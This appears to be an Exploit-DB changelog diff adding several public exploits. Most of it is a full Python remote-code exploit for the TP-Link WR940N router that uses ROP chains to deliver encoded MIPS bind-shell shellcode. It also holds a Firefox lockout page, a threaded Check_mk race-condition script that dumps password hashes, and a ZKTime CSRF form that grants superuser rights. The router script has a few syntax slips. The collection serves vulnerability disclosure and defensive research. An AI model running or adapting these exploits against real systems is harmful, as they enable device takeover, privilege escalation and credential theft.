DB: 2017-10-21

9 new exploits

Too many to list!

platforms/hardware/webapps/43022.py

@@ -0,0 +1,169 @@
+import urllib2
+import base64
+import hashlib
+from optparse import *
+import sys
+import urllibbanner = (
+"___________________________________________________________________________\n"
+"WR940N Authenticated Remote Code Exploit\n"
+"This exploit will open a bind shell on the remote target\n"
+"The port is 31337, you can change that in the code if you wish\n"
+"This exploit requires authentication, if you know the creds, then\n"
+"use the -u -p options, otherwise default is admin:admin\n"
+"___________________________________________________________________________"
+)
+
+def login(ip, user, pwd):
+    print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)
+    
+    #### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))
+    hash = hashlib.md5()
+    hash.update(pwd)
+    auth_string = "%s:%s" %(user, hash.hexdigest())
+    encoded_string = base64.b64encode(auth_string)
+    print "[+] Encoded authorisation: %s" %encoded_string
+    
+    #### Send the request
+    url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"
+    print "[+] sending login to " + url
+    req = urllib2.Request(url)
+    req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)
+    resp = urllib2.urlopen(req)
+    
+    #### The server generates a random path for further requests, grab that here
+    data = resp.read()
+    next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])
+    print "[+] Got random path for next stage, url is now %s" %next_url
+    
+    return (next_url, encoded_string)
+
+#custom bind shell shellcode with very simple xor encoder
+#followed by a sleep syscall to flush cash before running
+#bad chars = 0x20, 0x00
+shellcode = (
+#encoder
+"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"
+"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit
+"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"
+"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"
+"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"
+"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"
+"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"
+"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"
+"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"
+"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"
+"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"
+"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"
+"\x02\x2a\x18\x26\xae\x43\xff\xc1"
+
+#sleep
+"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"
+"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
+"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"
+
+################ encoded shellcode ###############
+"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"
+"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"
+"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"
+"\x7a\x69"            #<————————- PORT 0x7a69 (31337)
+"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"
+"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"
+"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"
+"\x01\x0c\x24\x0f\x73\x50"
+"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"
+"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"
+"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"
+"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"
+"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"
+"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"
+"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"
+"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"
+"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"
+"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
+"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"
+)
+
+###### useful gadgets #######
+nop = "\x22\x51\x44\x44"
+gadg_1 = "\x2A\xB3\x7C\x60"
+gadg_2 = "\x2A\xB1\x78\x40"
+sleep_addr = "\x2a\xb3\x50\x90"
+stack_gadg = "\x2A\xAF\x84\xC0"
+call_code = "\x2A\xB2\xDC\xF0"
+
+def first_exploit(url, auth):
+    #                      trash $s1        $ra
+    rop = "A"*164 + gadg_2  + gadg_1 + "B"*0x20 + sleep_addr + "C"*4
+    rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode
+    
+    params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}
+    
+    new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)
+    
+    print "[+] sending exploit..."
+    print "[+] Wait a couple of seconds before connecting"
+    print "[+] When you are finished do http -r to reset the http service"
+    
+    req = urllib2.Request(new_url)
+    req.add_header('Cookie', 'Authorization=Basic %s' %auth)
+    req.add_header('Referer', url + "DiagnosticRpm.htm")
+    
+    resp = urllib2.urlopen(req)
+
+def second_exploit(url, auth):
+    url = url + "WanStaticIpV6CfgRpm.htm?"
+    #                 trash      s0      s1      s2       s3     s4      ret     shellcode
+    payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c
+    payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4
+    payload += stack_gadg + "A"*4 +  nop*10 + shellcode + "B"*7
+    print len(payload)
+    
+    params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',
+    'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',
+    'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',
+    'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}
+    
+    new_url = url + urllib.urlencode(params)
+    
+    print "[+] sending exploit…"
+    print "[+] Wait a couple of seconds before connecting"
+    print "[+] When you are finished do http -r to reset the http service"
+    
+    req = urllib2.Request(new_url)
+    req.add_header('Cookie', 'Authorization=Basic %s' %auth)
+    req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")
+    
+    resp = urllib2.urlopen(req)
+
+if __name__ == '__main__':
+    print banner
+    username = "admin"
+    password = "admin"
+
+    parser = OptionParser()
+    parser.add_option("-t", "–target", dest="host",
+    help="target ip address")
+    
+    parser.add_option("-u", "–user", dest="username",
+    help="username for authentication",
+    default="admin")
+    
+    parser.add_option("-p", "–password", dest="password",
+    help="password for authentication",
+    default="admin")
+    
+    (options, args) = parser.parse_args()
+    
+    if options.host is None:
+    parser.error("[x] A host name is required at the minimum [x]")
+    
+    if options.username is not None:
+    username = options.username
+    if options.password is not None:
+    password = options.password
+    
+    (next_url, encoded_string) = login(options.host, username, password)
+    
+    ###### Both exploits result in the same bind shell ######
+    #first_exploit(data[0], data[1])
+    second_exploit(next_url, encoded_string).    

platforms/linux/local/21362.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/4413/info
 
 Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems.
@@ -5,6 +6,7 @@ Oracle 8i is a powerful relational database product. It is available for Windows
 A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'.
 
 Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable. 
+*/
 
 /*
  * Yet another exploit for the 'Unbreakable' Oracle database

platforms/multiple/dos/43020.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Mozilla Firefox < 55 - Forcibly make someone view a web content
+# Category: Denial of Service
+# Date: 5/11/17
+# CVE : CVE-2017-7783
+# Affected Version: < Mozilla Firefox 55
+# Tested on: Windows/Linux
+# Software Link: https://www.mozilla.org/en-US/firefox/52.0/releasenotes/
+# Exploit Author: Amit Sangra
+# Website: http://CyberCriminals.net
+ 
+# Description:
+ 
+If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service.
+ 
+# Impact:
+
+An attacker can create a webpage having some content and exploit.
+Now once a victim visits this webpage, his browser gets locked out and he is forcibly made to view attacker supplied content.
+ 
+# Exploit:
+ 
+<?php
+$exploit=str_repeat(chr(0x41),10000);
+$location="http://Username".$exploit.":Password@Firefox.com";
+echo "<center><h1>Firefox Lockout Vulnerability</h1>";
+//Content to be forcibly viewed
+echo "<iframe width=854 height=480 src=https://www.youtube.com/embed/QH2-TGUlwu4?autoplay=1 frameborder=0 allowfullscreen></iframe></center>";
+//End
+echo "<script>setTimeout(\"location.href ='".$location."';\",10000);</script>";
+?>
+ 
+# Solution:
+   
+Update to version 55
+https://www.mozilla.org/en-US/firefox/55.0/releasenotes/
+ 
+# Mozilla Foundation Security Advisory:
+https://www.mozilla.org/en-US/security/advisories/mfsa2017-18/#CVE-2017-7783

platforms/php/webapps/42981.txt

@@ -1,9 +1,11 @@
-# Exploit Title: E-Sic Software livre CMS - Sql Injection# Date:
+# Exploit Title: E-Sic Software livre CMS - Sql Injection
-12/10/2017# Exploit Author: Elber Tavares
+# Date: 12/10/2017
+# Exploit Author: Elber Tavares
 # fireshellsecurity.team/
-# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
+# Vendor Homepage: https://softwarepublico.gov.br/
-Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
+# Version: 1.0
-https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
+# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 
 http://whiteboyz.xyz/esic-software-publico-sql-injection.html

platforms/python/webapps/43021.py

@@ -0,0 +1,211 @@
+1. ADVISORY INFORMATION
+=======================
+Product:        Check_mk
+Vendor URL:     https://mathias-kettner.de/check_mk.html
+Type:           Race Condition [CWE-362]
+Date found:     2017-09-21
+Date published: 2017-10-18
+CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
+CVE:            CVE-2017-14955
+
+
+2. CREDITS
+==========
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+
+
+3. VERSIONS AFFECTED
+====================
+Check_mk v1.2.8p25
+Check_mk v1.2.8p25 Enterprise
+older versions may be affected too.
+
+
+4. INTRODUCTION
+===============
+Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
+Check_MK is available as Raw Edition, which is 100% pure open source, and as
+Enterprise Edition with a lot of additional features and professional support.
+
+(from the vendor's homepage)
+
+
+5. VULNERABILITY DETAILS
+========================
+Check_mk is vulnerable to an unauthenticated information disclosure through a
+race condition during the authentication process when trying to authenticate
+with a valid username and an invalid password.
+
+On a failed login, the application calls the function save_users(), which
+performs two os.rename operations on the files "contacts.mk.new" and
+"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
+
+[..]
+   # Check_MK's monitoring contacts
+   filename = root_dir + "contacts.mk.new"
+   out = create_user_file(filename, "w")
+   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
+   out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
+   out.close()
+   os.rename(filename, filename[:-4])
+
+   # Users with passwords for Multisite
+   filename = multisite_dir + "users.mk.new"
+   make_nagios_directory(multisite_dir)
+   out = create_user_file(filename, "w")
+   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
+   out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
+   out.close()
+   os.rename(filename, filename[:-4])
+[...]
+
+When sending many concurrent authentication requests with an existing/valid
+username, such as:
+
+POST /check_mk/login.py HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
+Content-Length: 772
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+---9519178121294961341040589727
+Content-Disposition: form-data; name="filled_in"
+
+login
+---9519178121294961341040589727
+Content-Disposition: form-data; name="_login"
+
+1
+---9519178121294961341040589727
+Content-Disposition: form-data; name="_origtarget"
+
+index.py
+---9519178121294961341040589727
+Content-Disposition: form-data; name="_username"
+
+omdadmin
+---9519178121294961341040589727
+Content-Disposition: form-data; name="_password"
+
+welcome
+---9519178121294961341040589727
+Content-Disposition: form-data; name="_login"
+
+Login
+---9519178121294961341040589727--
+
+Then it could happen that one of both os.rename() calls references a non-
+existing file, which has just been renamed by a previous thread. This causes the
+Python script to fail and throw a crash report, which discloses a variety of
+sensitive information, such as internal server paths, account details including
+hashed passwords:
+
+</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
+                             'contactgroups': ['all'],
+                             'disable_notifications': False,
+                             'email': u'admin@example.com',
+                             'enforce_pw_change': False,
+                             'last_pw_change': 0,
+                             'last_seen': 0.0,
+                             'locked': False,
+                             'num_failed': 0,
+                             'pager': '',
+                             'password': '$1$400000$13371337asdfasdf',
+                             'roles': ['admin'],
+                             'serial': 2},
+
+A script to automatically exploit this vulnerability can be found on [0].
+
+6. POC
+======
+
+#!/usr/bin/python
+# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
+# Version:       <=3D 1.2.8p25
+# Date:          2017-10-18
+# Author:        Julien Ahrens (@MrTuxracer)
+# Homepage:      https://www.rcesecurity.com
+# Software Link: https://mathias-kettner.de/check_mk.html
+# Tested on:     1.2.8p25
+# CVE:=09=09 CVE-2017-14955
+#
+# Howto / Notes:
+# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
+# below as described by CVE-2017-14955. You only need a valid username to
+# dump all encrypted passwords and make sure to setup a local proxy to
+# catch the dump. Happy brute forcing ;-)
+
+import requests
+import threading
+
+try:
+=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
+=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+except:
+=09pass
+
+# Config Me
+target_url =3D "https://localhost/check_mk/login.py"
+target_username =3D "omdadmin"
+
+proxies =3D {
+  'http': 'http://127.0.0.1:8080',
+  'https': 'http://127.0.0.1:8080',
+}
+
+def make_session():
+=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
+=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
+ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
+'random'), '_login': (None, 'Login')})
+=09return v.content
+
+NUM =3D 50
+
+threads =3D []
+for i in range(NUM):
+    t =3D threading.Thread(target=3Dmake_session)
+    threads.append(t)
+    t.start()
+
+7. RISK
+=======
+To successfully exploit this vulnerability an unauthenticated attacker must only
+have network-level access to the application.
+
+The vulnerability allows remote attackers to trigger an exception, which
+discloses a variety of sensitive internal information such as:
+- Local server paths
+- Usernames
+- Passwords (hashed)
+- and user directory-specific attributes (i.e. LDAP)
+
+
+8. SOLUTION
+===========
+Update to 1.2.8p26.
+
+
+9. REPORT TIMELINE
+==================
+2017-09-21: Discovery of the vulnerability
+2017-09-21: Sent limited information to publicly listed email address
+2017-09-21: Vendor responds and asks for details
+2017-09-21: Full vulnerability details sent to vendor
+2017-09-25: Vendor pushes fix to git
+2017-10-01: MITRE assigns CVE-2017-14955
+2017-10-16: Fix confirmed
+2017-10-18: Public disclosure
+
+
+10. REFERENCES
+=============
+[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
+[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
+
+

platforms/windows/webapps/43018.html

@@ -0,0 +1,83 @@
+Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
+CVE-ID: CVE-2017-13129
+Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
+Vendor of Product: ZKTeco
+Affected Product Code: ZKTime Web - 2.0.1.12280
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+
+------------------------------------------
+
+Product description:
+ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
+provided a stable communication for devices through GPRS/WAN, hence, users
+can access the software anywhere by their Web Browser to remotely manage
+hundreds of T&A terminals under complex network condition (WLAN). The
+Application has an administrator role and application user role.
+
+Attack Description:
+The ZKTime Web Software allows the Administrator to elevate the privileges
+of the application user by simple click of a radio button namely
+"superuser". However when the request is generated there are no random
+tokens attached to this request to prevent any kind of Cross Site Request
+Forgery attacks. Moreover there no other protections (like administrator
+password verification etc.) mechanisms in place to block any kind of forged
+requests.
+An Attacker takes advantage of this scenario and creates a crafted link to
+add himself as an administrator to the ZKTime Web Software. He then uses
+social engineering methods to trick the administrator into click the forged
+http request. The request is executed and the attacker becomes the
+Administrator of the
+ZKTime Web Software.
+
+Proof of Concept Code:
+Forged HTTP Request used by the attacker:
+<html>
+    <body>
+    <form action="http://XX.XX.XX.46:8081/data/auth/User/14/
+<http://xx.xx.xx.46:8081/data/auth/User/14/>" method="POST">
+      <input type="hidden" name="pk" value="" />
+      <input type="hidden" name="username" value="Pentestuser1" />
+      <input type="hidden" name="Password" value="" />
+      <input type="hidden" name="ResetPassword" value="" />
+      <input type="hidden" name="fpidnum" value="" />
+      <input type="hidden" name="fpcount" value="0" />
+      <input type="hidden" name="tlng" value="en" />
+      <input type="hidden" name="first_name" value="Pentest" />
+      <input type="hidden" name="last_name" value="User" />
+      <input type="hidden" name="email" value="" />
+      <input type="hidden" name="is_staff" value="on" />
+      <input type="hidden" name="is_superuser" value="on" />
+      <input type="hidden" name="last_login" value="2017-08-20 14:14:34" />
+      <input type="hidden" name="initial-last_login" value="2017-08-20
+14:14:34" />
+      <input type="hidden" name="date_joined" value="2017-08-20 14:14:34" />
+      <input type="hidden" name="initial-date_joined" value="2017-08-20
+14:14:34" />
+      <input type="hidden" name="finnger" value="" />
+      <input type="hidden" name="template" value="" />
+      <input type="hidden" name="finger10" value="" />
+      <input type="hidden" name="template10" value="" />
+      <input type="hidden" name="delfp" value="" />
+      <input type="hidden" name="actflag" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+</body>
+</html>
+
+Impact:
+If the vulnerability is successfully exploited than an attacker (who would
+be a normal user of the web application) can escalate his privileges and
+become the administrator of ZK Time Web Software.
+
+References:
+http://seclists.org/fulldisclosure/2017/Sep/38
+http://seclists.org/bugtraq/2017/Sep/19
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129
+
+Vulnerability Timeline:
+18th August 2017 – Vulnerability Discovered
+20th August 2017 – Contacted Vendor – No Response
+1st September 2017 – Contacted Vendor again – No Response
+18th September 2017 – Vulnerability Disclosed

platforms/windows/webapps/43019.txt

@@ -0,0 +1,53 @@
+Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
+CVE-ID: CVE-2017-14680
+Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
+Vendor of Product: ZKTeco
+Affected Product Code: ZKTime Web - 2.0.1.12280
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+
+------------------------------------------
+
+Product description:
+ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
+provided a stable communication for devices through GPRS/WAN, hence, users
+can access the software anywhere by their Web Browser to remotely manage
+hundreds of T&A terminals under complex network condition (WLAN). The
+Application has an administrator role and application user role.
+
+Attack Description:
+The Application is a time attendance software which allows users to
+download their time and attendance data from the application in a PDF
+Format. The data includes their employee’s id, user-id, gender,
+birth-dates, phone numbers and access-areas. These PDF Files however are
+not properly authenticated. If any user get access to the file-download
+link, he can go ahead and download these files directly without any
+authentication.
+
+Proof of Concept Links:
+
+1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
+<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144237.pdf>
+2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
+<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144238.pdf>
+3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf
+<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144239.pdf>
+
+
+Impact:
+Personal details pertaining to the employees of the company are disclosed
+without their permissions. This leads to violation of user privacy.
+Moreover the information available can be used to mount further attacks.
+
+References:
+http://seclists.org/fulldisclosure/2017/Sep/39
+http://seclists.org/bugtraq/2017/Sep/20
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680
+
+
+Vulnerability Timeline:
+18th August 2017 – Vulnerability Discovered
+20th August 2017 – Contacted Vendor – No Response
+1st September 2017 – Contacted Vendor again – No Response
+18th September 2017 – Vulnerability Disclosed